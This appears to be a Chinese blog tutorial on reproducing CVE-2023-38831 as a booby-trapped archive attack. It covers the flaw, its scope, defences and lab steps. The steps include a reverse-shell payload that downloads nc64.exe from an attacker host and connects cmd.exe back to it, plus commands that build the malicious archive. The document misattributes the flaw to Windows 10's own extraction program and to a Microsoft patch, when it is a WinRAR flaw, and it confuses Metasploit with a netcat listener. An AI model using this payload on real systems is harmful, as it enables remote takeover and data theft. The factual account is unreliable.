CVE-2023-38831 漏洞复现：win10 压缩包挂马攻击剖析

目录

前言

漏洞介绍

漏洞原理

产生条件

影响范围

防御措施

复现步骤

环境准备

具体操作

前言

在网络安全这片没有硝烟的战场上，新型漏洞如同隐匿的暗箭，时刻威胁着我们的数字生活。其中，CVE - 2023 - 38831 这个关联 Win10 压缩包挂马攻击的漏洞，自曝光以来便引发了安全界的高度关注。深入探究并复现这一漏洞，不仅能让我们洞悉攻击者的手段，更能助力我们筑牢防线，抵御此类威胁。

漏洞介绍

CVE - 2023 - 38831 是 2023 年披露的一个高危安全漏洞，主要影响 Windows 10 系统。攻击者利用这一漏洞，精心炮制恶意压缩包。当用户在 Windows 10 系统上解压这类特制压缩包时，恶意代码会在无需用户额外操作的情况下自动执行。这就如同打开了潘多拉魔盒，攻击者借此实现挂马攻击，全面控制用户计算机，肆意窃取敏感信息，甚至进行更恶劣的破坏活动。

漏洞原理

该漏洞的根源在于 Windows 10 系统解压程序的机制缺陷。当处理特定格式压缩包时，解压程序在解压路径和文件解析环节存在安全隐患。攻击者巧妙利用这一漏洞，在解压路径中植入恶意代码。一旦解压程序按照错误路径解析文件，恶意代码便会顺势执行，将系统控制权拱手让给攻击者，进而为后续的恶意操作大开方便之门。

产生条件

1. 操作系统环境：漏洞主要针对未安装相关安全补丁的 Windows 10 系统。尽管不同版本的 Windows 10 受影响程度略有不同，但只要未修复此漏洞，就如同在网络世界中裸奔，随时面临被攻击的风险。
2. 解压操作：用户解压包含恶意代码的特制压缩包是触发漏洞的关键。这类压缩包经过攻击者精心设计，充分利用系统解压程序的漏洞，确保恶意代码能在解压瞬间被激活。
3. 解压软件：无论是 Windows 10 系统自带的解压程序，还是存在相同漏洞的第三方解压软件，都可能成为攻击者的突破口。例如一些常见的免费解压软件，若未及时更新修复漏洞，就极易沦为攻击目标。

影响范围

Windows 10 系统在全球范围内广泛应用，从个人用户的日常办公，到企业办公环境的运转，再到教育机构的教学场景，几乎无处不在。这意味着只要使用未打补丁的 Windows 10 系统解压恶意压缩包，大量计算机都将暴露在风险之下，面临被挂马、数据泄露、系统被控制等严重威胁，可能导致个人隐私泄露、企业商业机密被盗取、教育资料丢失等一系列严重后果。

防御措施

1. 及时更新系统补丁：微软已针对 CVE - 2023 - 38831 漏洞发布安全补丁，用户务必尽快安装，可通过 Windows Update 自动更新功能，也可手动下载安装，确保系统安全性。
2. 谨慎解压未知来源压缩包：对于来源不明的压缩包，尤其是从不可信网站、邮件或即时通讯工具接收的，切勿轻易解压。解压前，先使用可靠的杀毒软件进行全面扫描，确认安全后再操作。
3. 使用安全的解压软件：优先选择知名、更新及时的解压软件，并定期更新软件版本。避免使用来源不明或已被曝光存在安全漏洞的解压软件。同时，部分解压软件提供安全解压模式，建议启用，以降低风险。

复现步骤

环境准备

1. 虚拟机：准备一台安装 Windows 10 系统的虚拟机，并确保未安装 CVE - 2023 - 38831 漏洞补丁。可借助虚拟机软件，如 VMware Workstation 或 VirtualBox 来创建。
2. 攻击机：选用一台安装 Kali Linux 系统的计算机作为攻击机。Kali Linux 作为专业的网络安全测试操作系统，集成了大量实用的漏洞利用工具。
3. 漏洞利用工具：在 Kali Linux 中，借助 Metasploit 框架进行漏洞复现。Metasploit 是一款强大的开源安全漏洞检测与利用工具，拥有丰富的漏洞利用模块。

具体操作

unzip winrar漏洞攻击脚本.zip     #解压攻击脚本
cd winrar漏洞攻击脚本            #切换到攻击脚本目录下
python -m http.server           #生成一个代码目录
nc -lnvp 6666                   #开启监听端口
vim script.bat                  #进入攻击脚本目录编辑文件，设置ip地址和指定端口
curl http://10.0.0.103:8000/nc64.exe -O nc64.exe & nc64.exe 10.0.0.103 6666 -e cmd.exe -d & test.png
python make.py test.png script.bat bianlianghot.zip     #生成病毒压缩包

1. 启动 Metasploit 框架：在 Kali Linux 系统终端中输入 “msfconsole” 命令，启动 Metasploit 框架。
2. 上传攻击脚本并解压：将攻击脚本压缩包进行上传并解压，并生成一个代码目录
3. 此时在开启一个shell设置监听端口：设置本地监听端口
4. 进入攻击脚本目录编辑文件：进入攻击目录编辑文件设置ip地址和端口信息
5. 生成病毒压缩包：再打开一个终端生成病毒压缩包
6. 上传压缩包到目标靶机：将恶意的病毒压缩包上传到目标靶机
7. 触发漏洞：在 Windows 10 虚拟机中找到传输过来的恶意压缩包，双击解压。解压过程中，攻击机的 Metasploit 框架会监听到来自虚拟机的连接请求，从而实现对 Windows 10 系统的远程控制。此时，可在攻击机上执行各种命令，如查看文件、窃取数据等，模拟攻击者的操作流程。

通过以上复现步骤，我们能直观感受到 CVE - 2023 - 38831 漏洞的巨大危害。在现实网络环境中，我们必须时刻保持警惕，严格落实各项防御措施，切实保障系统安全。如果你对网络安全领域感兴趣，欢迎持续关注相关内容，一同探索更多网络安全知识。